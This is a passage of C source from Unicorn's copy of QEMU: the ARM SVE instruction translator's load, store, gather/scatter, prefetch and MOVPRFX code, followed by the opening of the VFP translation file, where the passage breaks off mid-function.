NULL, NULL }, { gen_helper_sve_ld1bss_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bhs_r, NULL, NULL, NULL }, { gen_helper_sve_ld1dd_le_r, gen_helper_sve_ld2dd_le_r, gen_helper_sve_ld3dd_le_r, gen_helper_sve_ld4dd_le_r } }, /* Big-endian */ { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld2bb_r, gen_helper_sve_ld3bb_r, gen_helper_sve_ld4bb_r }, { gen_helper_sve_ld1bhu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bsu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bdu_r, NULL, NULL, NULL }, { gen_helper_sve_ld1sds_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hh_be_r, gen_helper_sve_ld2hh_be_r, gen_helper_sve_ld3hh_be_r, gen_helper_sve_ld4hh_be_r }, { gen_helper_sve_ld1hsu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hdu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hds_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1hss_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1ss_be_r, gen_helper_sve_ld2ss_be_r, gen_helper_sve_ld3ss_be_r, gen_helper_sve_ld4ss_be_r }, { gen_helper_sve_ld1sdu_be_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bds_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bss_r, NULL, NULL, NULL }, { gen_helper_sve_ld1bhs_r, NULL, NULL, NULL }, { gen_helper_sve_ld1dd_be_r, gen_helper_sve_ld2dd_be_r, gen_helper_sve_ld3dd_be_r, gen_helper_sve_ld4dd_be_r } } }; gen_helper_gvec_mem *fn = fns[s->be_data == MO_BE][dtype][nreg]; /* While there are holes in the table, they are not * accessible via the instruction encoding. 
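* The table is indexed [be][dtype][nreg]: dtype encodes both the
* memory element size and the sign/zero extension, and only the
* same-size dtypes have LD2/LD3/LD4 variants, so the NULL slots can
* never be selected by a valid encoding.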
*/ assert(fn != NULL); do_mem_zpa(s, zt, pg, addr, dtype, fn); } static bool trans_LD_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31) { return false; } if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), dtype_msz(a->dtype)); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_ld_zpa(s, a->rd, a->pg, addr, a->dtype, a->nreg); } return true; } static bool trans_LD_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> dtype_esz[a->dtype]; TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), (a->imm * elements * (a->nreg + 1)) << dtype_msz(a->dtype)); do_ld_zpa(s, a->rd, a->pg, addr, a->dtype, a->nreg); } return true; } static bool trans_LDFF1_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][16] = { /* Little-endian */ { gen_helper_sve_ldff1bb_r, gen_helper_sve_ldff1bhu_r, gen_helper_sve_ldff1bsu_r, gen_helper_sve_ldff1bdu_r, gen_helper_sve_ldff1sds_le_r, gen_helper_sve_ldff1hh_le_r, gen_helper_sve_ldff1hsu_le_r, gen_helper_sve_ldff1hdu_le_r, gen_helper_sve_ldff1hds_le_r, gen_helper_sve_ldff1hss_le_r, gen_helper_sve_ldff1ss_le_r, gen_helper_sve_ldff1sdu_le_r, gen_helper_sve_ldff1bds_r, gen_helper_sve_ldff1bss_r, gen_helper_sve_ldff1bhs_r, gen_helper_sve_ldff1dd_le_r }, /* Big-endian */ { gen_helper_sve_ldff1bb_r, gen_helper_sve_ldff1bhu_r, gen_helper_sve_ldff1bsu_r, gen_helper_sve_ldff1bdu_r, gen_helper_sve_ldff1sds_be_r, gen_helper_sve_ldff1hh_be_r, gen_helper_sve_ldff1hsu_be_r, gen_helper_sve_ldff1hdu_be_r, gen_helper_sve_ldff1hds_be_r, gen_helper_sve_ldff1hss_be_r, gen_helper_sve_ldff1ss_be_r, gen_helper_sve_ldff1sdu_be_r, gen_helper_sve_ldff1bds_r, gen_helper_sve_ldff1bss_r, gen_helper_sve_ldff1bhs_r, gen_helper_sve_ldff1dd_be_r }, }; if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), dtype_msz(a->dtype)); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_mem_zpa(s, a->rd, a->pg, addr, a->dtype, fns[s->be_data == MO_BE][a->dtype]); } return true; } static bool trans_LDNF1_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][16] = { /* Little-endian */ { gen_helper_sve_ldnf1bb_r, gen_helper_sve_ldnf1bhu_r, gen_helper_sve_ldnf1bsu_r, gen_helper_sve_ldnf1bdu_r, gen_helper_sve_ldnf1sds_le_r, gen_helper_sve_ldnf1hh_le_r, gen_helper_sve_ldnf1hsu_le_r, gen_helper_sve_ldnf1hdu_le_r, gen_helper_sve_ldnf1hds_le_r, gen_helper_sve_ldnf1hss_le_r, gen_helper_sve_ldnf1ss_le_r, gen_helper_sve_ldnf1sdu_le_r, gen_helper_sve_ldnf1bds_r, gen_helper_sve_ldnf1bss_r, gen_helper_sve_ldnf1bhs_r, gen_helper_sve_ldnf1dd_le_r }, /* Big-endian */ { gen_helper_sve_ldnf1bb_r, gen_helper_sve_ldnf1bhu_r, gen_helper_sve_ldnf1bsu_r, gen_helper_sve_ldnf1bdu_r, gen_helper_sve_ldnf1sds_be_r, gen_helper_sve_ldnf1hh_be_r, gen_helper_sve_ldnf1hsu_be_r, gen_helper_sve_ldnf1hdu_be_r, gen_helper_sve_ldnf1hds_be_r, gen_helper_sve_ldnf1hss_be_r, gen_helper_sve_ldnf1ss_be_r, gen_helper_sve_ldnf1sdu_be_r, gen_helper_sve_ldnf1bds_r, gen_helper_sve_ldnf1bss_r, gen_helper_sve_ldnf1bhs_r, gen_helper_sve_ldnf1dd_be_r }, }; if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> dtype_esz[a->dtype]; int off = (a->imm * elements) << dtype_msz(a->dtype); 
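/* The immediate steps in units of whole vectors.  Non-fault loads
 * never take a memory fault; a failing element is reported through
 * FFR instead.
 */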
TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), off); do_mem_zpa(s, a->rd, a->pg, addr, a->dtype, fns[s->be_data == MO_BE][a->dtype]); } return true; } static void do_ldrq(DisasContext *s, int zt, int pg, TCGv_i64 addr, int msz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_mem * const fns[2][4] = { { gen_helper_sve_ld1bb_r, gen_helper_sve_ld1hh_le_r, gen_helper_sve_ld1ss_le_r, gen_helper_sve_ld1dd_le_r }, { gen_helper_sve_ld1bb_r, gen_helper_sve_ld1hh_be_r, gen_helper_sve_ld1ss_be_r, gen_helper_sve_ld1dd_be_r }, }; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_pg; TCGv_i32 t_desc; int desc, poff; /* Load the first quadword using the normal predicated load helpers. */ desc = sve_memopidx(s, msz_dtype(s, msz)); desc |= zt << MEMOPIDX_SHIFT; desc = simd_desc(16, 16, desc); t_desc = tcg_const_i32(tcg_ctx, desc); poff = pred_full_reg_offset(s, pg); if (vsz > 16) { /* * Zero-extend the first 16 bits of the predicate into a temporary. * This avoids triggering an assert making sure we don't have bits * set within a predicate beyond VQ, but we have lowered VQ to 1 * for this load operation. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); #ifdef HOST_WORDS_BIGENDIAN poff += 6; #endif tcg_gen_ld16u_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, poff); poff = offsetof(CPUARMState, vfp.preg_tmp); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, poff); tcg_temp_free_i64(tcg_ctx, tmp); } t_pg = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, poff); fns[s->be_data == MO_BE][msz](tcg_ctx, tcg_ctx->cpu_env, t_pg, addr, t_desc); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); /* Replicate that first quadword. */ if (vsz > 16) { unsigned dofs = vec_full_reg_offset(s, zt); tcg_gen_gvec_dup_mem(tcg_ctx, 4, dofs + 16, dofs, vsz - 16, vsz - 16); } } static bool trans_LD1RQ_zprr(DisasContext *s, arg_rprr_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31) { return false; } if (sve_access_check(s)) { int msz = dtype_msz(a->dtype); TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), msz); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_ldrq(s, a->rd, a->pg, addr, msz); } return true; } static bool trans_LD1RQ_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), a->imm * 16); do_ldrq(s, a->rd, a->pg, addr, dtype_msz(a->dtype)); } return true; } /* Load and broadcast element. */ static bool trans_LD1R_zpri(DisasContext *s, arg_rpri_load *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned vsz = vec_full_reg_size(s); unsigned psz = pred_full_reg_size(s); unsigned esz = dtype_esz[a->dtype]; unsigned msz = dtype_msz(a->dtype); TCGLabel *over = gen_new_label(tcg_ctx); TCGv_i64 temp; /* If the guarding predicate has no bits set, no load occurs. */ if (psz <= 8) { /* Reduce the pred_esz_masks value simply to reduce the * size of the code generated here. 
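* If no predicate bit for this element size is set, the branch to
* 'over' skips the load and broadcast entirely; do_movz_zpz() below
* still zeroes every inactive element, which in that case is the
* whole register.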
*/ uint64_t psz_mask = MAKE_64BIT_MASK(0, psz * 8); temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, temp, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->pg)); tcg_gen_andi_i64(tcg_ctx, temp, temp, pred_esz_masks[esz] & psz_mask); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_EQ, temp, 0, over); tcg_temp_free_i64(tcg_ctx, temp); } else { TCGv_i32 t32 = tcg_temp_new_i32(tcg_ctx); find_last_active(s, t32, esz, a->pg); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, t32, 0, over); tcg_temp_free_i32(tcg_ctx, t32); } /* Load the data. */ temp = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, temp, cpu_reg_sp(s, a->rn), a->imm << msz); tcg_gen_qemu_ld_i64(tcg_ctx, temp, temp, get_mem_index(s), s->be_data | dtype_mop[a->dtype]); /* Broadcast to *all* elements. */ tcg_gen_gvec_dup_i64(tcg_ctx, esz, vec_full_reg_offset(s, a->rd), vsz, vsz, temp); tcg_temp_free_i64(tcg_ctx, temp); /* Zero the inactive elements. */ gen_set_label(tcg_ctx, over); do_movz_zpz(s, a->rd, a->rd, a->pg, esz); return true; } static void do_st_zpa(DisasContext *s, int zt, int pg, TCGv_i64 addr, int msz, int esz, int nreg) { static gen_helper_gvec_mem * const fn_single[2][4][4] = { { { gen_helper_sve_st1bb_r, gen_helper_sve_st1bh_r, gen_helper_sve_st1bs_r, gen_helper_sve_st1bd_r }, { NULL, gen_helper_sve_st1hh_le_r, gen_helper_sve_st1hs_le_r, gen_helper_sve_st1hd_le_r }, { NULL, NULL, gen_helper_sve_st1ss_le_r, gen_helper_sve_st1sd_le_r }, { NULL, NULL, NULL, gen_helper_sve_st1dd_le_r } }, { { gen_helper_sve_st1bb_r, gen_helper_sve_st1bh_r, gen_helper_sve_st1bs_r, gen_helper_sve_st1bd_r }, { NULL, gen_helper_sve_st1hh_be_r, gen_helper_sve_st1hs_be_r, gen_helper_sve_st1hd_be_r }, { NULL, NULL, gen_helper_sve_st1ss_be_r, gen_helper_sve_st1sd_be_r }, { NULL, NULL, NULL, gen_helper_sve_st1dd_be_r } }, }; static gen_helper_gvec_mem * const fn_multiple[2][3][4] = { { { gen_helper_sve_st2bb_r, gen_helper_sve_st2hh_le_r, gen_helper_sve_st2ss_le_r, gen_helper_sve_st2dd_le_r }, { gen_helper_sve_st3bb_r, gen_helper_sve_st3hh_le_r, gen_helper_sve_st3ss_le_r, gen_helper_sve_st3dd_le_r }, { gen_helper_sve_st4bb_r, gen_helper_sve_st4hh_le_r, gen_helper_sve_st4ss_le_r, gen_helper_sve_st4dd_le_r } }, { { gen_helper_sve_st2bb_r, gen_helper_sve_st2hh_be_r, gen_helper_sve_st2ss_be_r, gen_helper_sve_st2dd_be_r }, { gen_helper_sve_st3bb_r, gen_helper_sve_st3hh_be_r, gen_helper_sve_st3ss_be_r, gen_helper_sve_st3dd_be_r }, { gen_helper_sve_st4bb_r, gen_helper_sve_st4hh_be_r, gen_helper_sve_st4ss_be_r, gen_helper_sve_st4dd_be_r } }, }; gen_helper_gvec_mem *fn; int be = s->be_data == MO_BE; if (nreg == 0) { /* ST1 */ fn = fn_single[be][msz][esz]; } else { /* ST2, ST3, ST4 -- msz == esz, enforced by encoding */ assert(msz == esz); fn = fn_multiple[be][nreg - 1][msz]; } assert(fn != NULL); do_mem_zpa(s, zt, pg, addr, msz_dtype(s, msz), fn); } static bool trans_ST_zprr(DisasContext *s, arg_rprr_store *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->rm == 31 || a->msz > a->esz) { return false; } if (sve_access_check(s)) { TCGv_i64 addr = new_tmp_a64(s); tcg_gen_shli_i64(tcg_ctx, addr, cpu_reg(s, a->rm), a->msz); tcg_gen_add_i64(tcg_ctx, addr, addr, cpu_reg_sp(s, a->rn)); do_st_zpa(s, a->rd, a->pg, addr, a->msz, a->esz, a->nreg); } return true; } static bool trans_ST_zpri(DisasContext *s, arg_rpri_store *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->msz > a->esz) { return false; } if (sve_access_check(s)) { int vsz = vec_full_reg_size(s); int elements = vsz >> a->esz; TCGv_i64 addr = new_tmp_a64(s); tcg_gen_addi_i64(tcg_ctx, addr, cpu_reg_sp(s, a->rn), 
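/* As with LD_zpri, the immediate is scaled by the memory footprint
 * of the whole transfer: elements * (nreg + 1) accesses of
 * 1 << msz bytes each.
 */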
(a->imm * elements * (a->nreg + 1)) << a->msz); do_st_zpa(s, a->rd, a->pg, addr, a->msz, a->esz, a->nreg); } return true; } /* *** SVE gather loads / scatter stores */ static void do_mem_zpz(DisasContext *s, int zt, int pg, int zm, int scale, TCGv_i64 scalar, int msz, gen_helper_gvec_mem_scatter *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_ptr t_zm = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_zt = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t_desc; int desc; desc = sve_memopidx(s, msz_dtype(s, msz)); desc |= scale << MEMOPIDX_SHIFT; desc = simd_desc(vsz, vsz, desc); t_desc = tcg_const_i32(tcg_ctx, desc); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, pg)); tcg_gen_addi_ptr(tcg_ctx, t_zm, tcg_ctx->cpu_env, vec_full_reg_offset(s, zm)); tcg_gen_addi_ptr(tcg_ctx, t_zt, tcg_ctx->cpu_env, vec_full_reg_offset(s, zt)); fn(tcg_ctx, tcg_ctx->cpu_env, t_zt, t_pg, t_zm, scalar, t_desc); tcg_temp_free_ptr(tcg_ctx, t_zt); tcg_temp_free_ptr(tcg_ctx, t_zm); tcg_temp_free_ptr(tcg_ctx, t_pg); tcg_temp_free_i32(tcg_ctx, t_desc); } /* Indexed by [be][ff][xs][u][msz]. */ static gen_helper_gvec_mem_scatter * const gather_load_fn32[2][2][2][2][3] = { /* Little-endian */ { { { { gen_helper_sve_ldbss_zsu, gen_helper_sve_ldhss_le_zsu, NULL, }, { gen_helper_sve_ldbsu_zsu, gen_helper_sve_ldhsu_le_zsu, gen_helper_sve_ldss_le_zsu, } }, { { gen_helper_sve_ldbss_zss, gen_helper_sve_ldhss_le_zss, NULL, }, { gen_helper_sve_ldbsu_zss, gen_helper_sve_ldhsu_le_zss, gen_helper_sve_ldss_le_zss, } } }, /* First-fault */ { { { gen_helper_sve_ldffbss_zsu, gen_helper_sve_ldffhss_le_zsu, NULL, }, { gen_helper_sve_ldffbsu_zsu, gen_helper_sve_ldffhsu_le_zsu, gen_helper_sve_ldffss_le_zsu, } }, { { gen_helper_sve_ldffbss_zss, gen_helper_sve_ldffhss_le_zss, NULL, }, { gen_helper_sve_ldffbsu_zss, gen_helper_sve_ldffhsu_le_zss, gen_helper_sve_ldffss_le_zss, } } } }, /* Big-endian */ { { { { gen_helper_sve_ldbss_zsu, gen_helper_sve_ldhss_be_zsu, NULL, }, { gen_helper_sve_ldbsu_zsu, gen_helper_sve_ldhsu_be_zsu, gen_helper_sve_ldss_be_zsu, } }, { { gen_helper_sve_ldbss_zss, gen_helper_sve_ldhss_be_zss, NULL, }, { gen_helper_sve_ldbsu_zss, gen_helper_sve_ldhsu_be_zss, gen_helper_sve_ldss_be_zss, } } }, /* First-fault */ { { { gen_helper_sve_ldffbss_zsu, gen_helper_sve_ldffhss_be_zsu, NULL, }, { gen_helper_sve_ldffbsu_zsu, gen_helper_sve_ldffhsu_be_zsu, gen_helper_sve_ldffss_be_zsu, } }, { { gen_helper_sve_ldffbss_zss, gen_helper_sve_ldffhss_be_zss, NULL, }, { gen_helper_sve_ldffbsu_zss, gen_helper_sve_ldffhsu_be_zss, gen_helper_sve_ldffss_be_zss, } } } }, }; /* Note that we overload xs=2 to indicate 64-bit offset. 
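 * In gather_load_fn64, xs=0 selects zero-extended 32-bit offsets (the
 * _zsu helpers), xs=1 sign-extended 32-bit offsets (_zss), and xs=2 full
 * 64-bit offsets (_zd). trans_LD1_zpiz below relies on this overload by
 * indexing its 64-bit form with xs=2, since vector-plus-immediate
 * addressing uses the 64-bit vector elements directly as addresses.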
*/ static gen_helper_gvec_mem_scatter * const gather_load_fn64[2][2][3][2][4] = { /* Little-endian */ { { { { gen_helper_sve_ldbds_zsu, gen_helper_sve_ldhds_le_zsu, gen_helper_sve_ldsds_le_zsu, NULL, }, { gen_helper_sve_ldbdu_zsu, gen_helper_sve_ldhdu_le_zsu, gen_helper_sve_ldsdu_le_zsu, gen_helper_sve_lddd_le_zsu, } }, { { gen_helper_sve_ldbds_zss, gen_helper_sve_ldhds_le_zss, gen_helper_sve_ldsds_le_zss, NULL, }, { gen_helper_sve_ldbdu_zss, gen_helper_sve_ldhdu_le_zss, gen_helper_sve_ldsdu_le_zss, gen_helper_sve_lddd_le_zss, } }, { { gen_helper_sve_ldbds_zd, gen_helper_sve_ldhds_le_zd, gen_helper_sve_ldsds_le_zd, NULL, }, { gen_helper_sve_ldbdu_zd, gen_helper_sve_ldhdu_le_zd, gen_helper_sve_ldsdu_le_zd, gen_helper_sve_lddd_le_zd, } } }, /* First-fault */ { { { gen_helper_sve_ldffbds_zsu, gen_helper_sve_ldffhds_le_zsu, gen_helper_sve_ldffsds_le_zsu, NULL, }, { gen_helper_sve_ldffbdu_zsu, gen_helper_sve_ldffhdu_le_zsu, gen_helper_sve_ldffsdu_le_zsu, gen_helper_sve_ldffdd_le_zsu, } }, { { gen_helper_sve_ldffbds_zss, gen_helper_sve_ldffhds_le_zss, gen_helper_sve_ldffsds_le_zss, NULL, }, { gen_helper_sve_ldffbdu_zss, gen_helper_sve_ldffhdu_le_zss, gen_helper_sve_ldffsdu_le_zss, gen_helper_sve_ldffdd_le_zss, } }, { { gen_helper_sve_ldffbds_zd, gen_helper_sve_ldffhds_le_zd, gen_helper_sve_ldffsds_le_zd, NULL, }, { gen_helper_sve_ldffbdu_zd, gen_helper_sve_ldffhdu_le_zd, gen_helper_sve_ldffsdu_le_zd, gen_helper_sve_ldffdd_le_zd, } } } }, /* Big-endian */ { { { { gen_helper_sve_ldbds_zsu, gen_helper_sve_ldhds_be_zsu, gen_helper_sve_ldsds_be_zsu, NULL, }, { gen_helper_sve_ldbdu_zsu, gen_helper_sve_ldhdu_be_zsu, gen_helper_sve_ldsdu_be_zsu, gen_helper_sve_lddd_be_zsu, } }, { { gen_helper_sve_ldbds_zss, gen_helper_sve_ldhds_be_zss, gen_helper_sve_ldsds_be_zss, NULL, }, { gen_helper_sve_ldbdu_zss, gen_helper_sve_ldhdu_be_zss, gen_helper_sve_ldsdu_be_zss, gen_helper_sve_lddd_be_zss, } }, { { gen_helper_sve_ldbds_zd, gen_helper_sve_ldhds_be_zd, gen_helper_sve_ldsds_be_zd, NULL, }, { gen_helper_sve_ldbdu_zd, gen_helper_sve_ldhdu_be_zd, gen_helper_sve_ldsdu_be_zd, gen_helper_sve_lddd_be_zd, } } }, /* First-fault */ { { { gen_helper_sve_ldffbds_zsu, gen_helper_sve_ldffhds_be_zsu, gen_helper_sve_ldffsds_be_zsu, NULL, }, { gen_helper_sve_ldffbdu_zsu, gen_helper_sve_ldffhdu_be_zsu, gen_helper_sve_ldffsdu_be_zsu, gen_helper_sve_ldffdd_be_zsu, } }, { { gen_helper_sve_ldffbds_zss, gen_helper_sve_ldffhds_be_zss, gen_helper_sve_ldffsds_be_zss, NULL, }, { gen_helper_sve_ldffbdu_zss, gen_helper_sve_ldffhdu_be_zss, gen_helper_sve_ldffsdu_be_zss, gen_helper_sve_ldffdd_be_zss, } }, { { gen_helper_sve_ldffbds_zd, gen_helper_sve_ldffhds_be_zd, gen_helper_sve_ldffsds_be_zd, NULL, }, { gen_helper_sve_ldffbdu_zd, gen_helper_sve_ldffhdu_be_zd, gen_helper_sve_ldffsdu_be_zd, gen_helper_sve_ldffdd_be_zd, } } } }, }; static bool trans_LD1_zprz(DisasContext *s, arg_LD1_zprz *a) { gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = gather_load_fn32[be][a->ff][a->xs][a->u][a->msz]; break; case MO_64: fn = gather_load_fn64[be][a->ff][a->xs][a->u][a->msz]; break; } assert(fn != NULL); do_mem_zpz(s, a->rd, a->pg, a->rm, a->scale * a->msz, cpu_reg_sp(s, a->rn), a->msz, fn); return true; } static bool trans_LD1_zpiz(DisasContext *s, arg_LD1_zpiz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; TCGv_i64 imm; if (a->esz < a->msz || (a->esz == a->msz && !a->u)) { return false; } 
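/*
 * The test above enforces the encoding rules: the memory element may not
 * be wider than the vector element, and when the two are the same size
 * the load must be the unsigned (zero-extending) form, as there is
 * nothing left to sign-extend.
 */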
if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = gather_load_fn32[be][a->ff][0][a->u][a->msz]; break; case MO_64: fn = gather_load_fn64[be][a->ff][2][a->u][a->msz]; break; } assert(fn != NULL); /* Treat LD1_zpiz (zn[x] + imm) the same way as LD1_zprz (rn + zm[x]) * by loading the immediate into the scalar parameter. */ imm = tcg_const_i64(tcg_ctx, a->imm << a->msz); do_mem_zpz(s, a->rd, a->pg, a->rn, 0, imm, a->msz, fn); tcg_temp_free_i64(tcg_ctx, imm); return true; } /* Indexed by [be][xs][msz]. */ static gen_helper_gvec_mem_scatter * const scatter_store_fn32[2][2][3] = { /* Little-endian */ { { gen_helper_sve_stbs_zsu, gen_helper_sve_sths_le_zsu, gen_helper_sve_stss_le_zsu, }, { gen_helper_sve_stbs_zss, gen_helper_sve_sths_le_zss, gen_helper_sve_stss_le_zss, } }, /* Big-endian */ { { gen_helper_sve_stbs_zsu, gen_helper_sve_sths_be_zsu, gen_helper_sve_stss_be_zsu, }, { gen_helper_sve_stbs_zss, gen_helper_sve_sths_be_zss, gen_helper_sve_stss_be_zss, } }, }; /* Note that we overload xs=2 to indicate 64-bit offset. */ static gen_helper_gvec_mem_scatter * const scatter_store_fn64[2][3][4] = { /* Little-endian */ { { gen_helper_sve_stbd_zsu, gen_helper_sve_sthd_le_zsu, gen_helper_sve_stsd_le_zsu, gen_helper_sve_stdd_le_zsu, }, { gen_helper_sve_stbd_zss, gen_helper_sve_sthd_le_zss, gen_helper_sve_stsd_le_zss, gen_helper_sve_stdd_le_zss, }, { gen_helper_sve_stbd_zd, gen_helper_sve_sthd_le_zd, gen_helper_sve_stsd_le_zd, gen_helper_sve_stdd_le_zd, } }, /* Big-endian */ { { gen_helper_sve_stbd_zsu, gen_helper_sve_sthd_be_zsu, gen_helper_sve_stsd_be_zsu, gen_helper_sve_stdd_be_zsu, }, { gen_helper_sve_stbd_zss, gen_helper_sve_sthd_be_zss, gen_helper_sve_stsd_be_zss, gen_helper_sve_stdd_be_zss, }, { gen_helper_sve_stbd_zd, gen_helper_sve_sthd_be_zd, gen_helper_sve_stsd_be_zd, gen_helper_sve_stdd_be_zd, } }, }; static bool trans_ST1_zprz(DisasContext *s, arg_ST1_zprz *a) { gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; if (a->esz < a->msz || (a->msz == 0 && a->scale)) { return false; } if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = scatter_store_fn32[be][a->xs][a->msz]; break; case MO_64: fn = scatter_store_fn64[be][a->xs][a->msz]; break; default: g_assert_not_reached(); } do_mem_zpz(s, a->rd, a->pg, a->rm, a->scale * a->msz, cpu_reg_sp(s, a->rn), a->msz, fn); return true; } static bool trans_ST1_zpiz(DisasContext *s, arg_ST1_zpiz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_mem_scatter *fn = NULL; int be = s->be_data == MO_BE; TCGv_i64 imm; if (a->esz < a->msz) { return false; } if (!sve_access_check(s)) { return true; } switch (a->esz) { case MO_32: fn = scatter_store_fn32[be][0][a->msz]; break; case MO_64: fn = scatter_store_fn64[be][2][a->msz]; break; } assert(fn != NULL); /* Treat ST1_zpiz (zn[x] + imm) the same way as ST1_zprz (rn + zm[x]) * by loading the immediate into the scalar parameter. */ imm = tcg_const_i64(tcg_ctx, a->imm << a->msz); do_mem_zpz(s, a->rd, a->pg, a->rn, 0, imm, a->msz, fn); tcg_temp_free_i64(tcg_ctx, imm); return true; } /* * Prefetches */ static bool trans_PRF(DisasContext *s, arg_PRF *a) { /* Prefetch is a nop within QEMU. */ (void)sve_access_check(s); return true; } static bool trans_PRF_rr(DisasContext *s, arg_PRF_rr *a) { if (a->rm == 31) { return false; } /* Prefetch is a nop within QEMU. */ (void)sve_access_check(s); return true; } /* * Move Prefix * * TODO: The implementation so far could handle predicated merging movprfx. 
* The helper functions as written take an extra source register to * use in the operation, but the result is only written when predication * succeeds. For unpredicated movprfx, we need to rearrange the helpers * to allow the final write back to the destination to be unconditional. * For predicated zeroing movprfx, we need to rearrange the helpers to * allow the final write back to zero inactives. * * In the meantime, just emit the moves. */ static bool trans_MOVPRFX(DisasContext *s, arg_MOVPRFX *a) { return do_mov_z(s, a->rd, a->rn); } static bool trans_MOVPRFX_m(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_sel_z(s, a->rd, a->rn, a->rd, a->pg, a->esz); } return true; } static bool trans_MOVPRFX_z(DisasContext *s, arg_rpr_esz *a) { if (sve_access_check(s)) { do_movz_zpz(s, a->rd, a->rn, a->pg, a->esz); } return true; } unicorn-2.1.1/qemu/target/arm/translate-vfp.inc.c000066400000000000000000002352511467524106700217320ustar00rootroot00000000000000/* * ARM translation: AArch32 VFP instructions * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2005-2007 CodeSourcery * Copyright (c) 2007 OpenedHand, Ltd. * Copyright (c) 2019 Linaro, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * This file is intended to be included from translate.c; it uses * some macros and definitions provided by that file. * It might be possible to convert it to a standalone .c file eventually. */ /* Include the generated VFP decoder */ #include "decode-vfp.inc.c" #include "decode-vfp-uncond.inc.c" /* * The imm8 encodes the sign bit, enough bits to represent an exponent in * the range 01....1xx to 10....0xx, and the most significant 4 bits of * the mantissa; see VFPExpandImm() in the v8 ARM ARM. */ uint64_t vfp_expand_imm(int size, uint8_t imm8) { uint64_t imm = 0; switch (size) { case MO_64: imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | (extract32(imm8, 6, 1) ? 0x3fc0 : 0x4000) | extract32(imm8, 0, 6); imm <<= 48; break; case MO_32: imm = (extract32(imm8, 7, 1) ? 